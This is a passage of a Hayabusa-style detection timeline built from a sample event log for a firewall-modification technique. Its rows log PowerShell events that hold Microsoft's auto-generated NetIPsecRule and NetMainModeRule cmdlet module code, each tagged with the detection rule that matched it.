$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.775 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.776 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.777 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.785 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.786 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.787 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 